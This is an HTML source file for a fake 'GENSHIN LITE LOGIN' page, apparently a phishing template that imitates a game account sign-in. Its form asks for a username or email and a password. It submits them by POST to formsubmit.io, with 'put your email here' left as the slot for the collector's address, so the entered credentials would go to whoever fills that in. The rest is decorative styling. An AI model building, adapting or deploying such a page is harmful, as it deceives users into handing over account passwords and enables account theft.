<!DOCTYPE html>
<html>
    <head>
        <title>Web
        </title>
    </head>
    <font color="white">
    <style>
        body {
            background-image: url(https://media1.tenor.com/m/74XR2zVonbwAAAAC/lol.gif);
            background-attachment: cover;
            background-repeat: no-repeat;
            background-size: 100%;
        }
    </style>
     <center>
        <img src="https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/164eda0d-3e68-43b8-94b2-93fef358d9f6/dce9fsv-9e960c6e-cd72-4b50-9f28-c105cdc12f43.png/v1/fill/w_1192,h_670,q_70,strp/karina_doom_duelist_by_makinig_dce9fsv-pre.jpg?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9MTAxMyIsInBhdGgiOiJcL2ZcLzE2NGVkYTBkLTNlNjgtNDNiOC05NGIyLTkzZmVmMzU4ZDlmNlwvZGNlOWZzdi05ZTk2MGM2ZS1jZDcyLTRiNTAtOWYyOC1jMTA1Y2RjMTJmNDMucG5nIiwid2lkdGgiOiI8PTE4MDAifV1dLCJhdWQiOlsidXJuOnNlcnZpY2U6aW1hZ2Uub3BlcmF0aW9ucyJdfQ.Ng-rp9ipNsXgpf1MekpaW9pSwQ0L_E_NIA0Uuq178kc" height="100px" width="1900px">
        <h1><font color="yellow">GENSHIN LITE LOGIN</h1>
        <div class="container">
       
            <h1><font color="black">LOGIN HERE</font></h1>
           
                <div class="centered">
                    <b>
                    <br>
                    <content>
                        <br>
                        <br>
                        <br>
                        <br>
                        <br>
                       
                    <div class="loginform">
        <font color="red">
        <form id="contactform" action="https://formsubmit.io/send/put your email here" method="POST">
        <label for="usernameoremail">Username/Email:</label>
        <br>
        <br>
        <input type="email" name="usernameoremail" id="ename" placeholder="enter your username ex.Spongebob123@gmail.com" required>
<br>
<br>
<br>
<br>
        <label for="password">Password:</label>
        <br>
        <br>
        <input type="password" name="password" id="Pass" placeholder="enter your password" required>
                   </div>
                   </content>
        <style>
            input{
                border-color: rgb(187, 255, 0);
                display:inline-block;
                height:60px;
                border-radius:23px;
                width:400px;
                box-sizing:border-box;
                padding:0 18px;
            }
        </style>
 
<br>
<br>
<br>
        <button type="submit" style="background-color: rgb(162, 0, 255);"><font color="white">Log-In</button>
        <br>
        <br>
        <button type="reset" style="background-color: rgb(255, 0, 0);"><font color="white">Cancel</button>
 
       
       
        <br>
        <br>
        <br>    
        <hr color="black">    

        <br>
     <a href="#home"></a><h3><u><p><font color="black">Forgot email Forgot pass</h3>
     <style>
     
     </style>
 
         <style>
            button{
               
                border-color: rgb(164, 252, 0);
                display:inline-block;
                height:60px;
                border-radius:30px;
                width:200px;
                box-sizing:border-box;
                padding:0 18px;
 
           cursor:pointer;
}
        </style>
<style>
.container {
margin-top: 5%;
 position: relative;
 text-align: center;
 display: grid;
 grid-template-columns: 1/2;
 grid-template-rows: 100px 200px 20px;
 border-radius: 100px;
 border: 2px solid rgb(49,49,49);
 width: 499px;
 height: 700px;
 background-color: rgba(0, 225, 255, 0.388);
 backdrop-filter: blur(px);
 box-shadow: 2px 5px 15px rgb(255, 0, 0);
 
 }
 .centered {
 position: absolute;
 top: 50%;
 left: 50%;
 transform: translate(-50%, -50%);
}
</style>
 
</b>
    </center>
</body>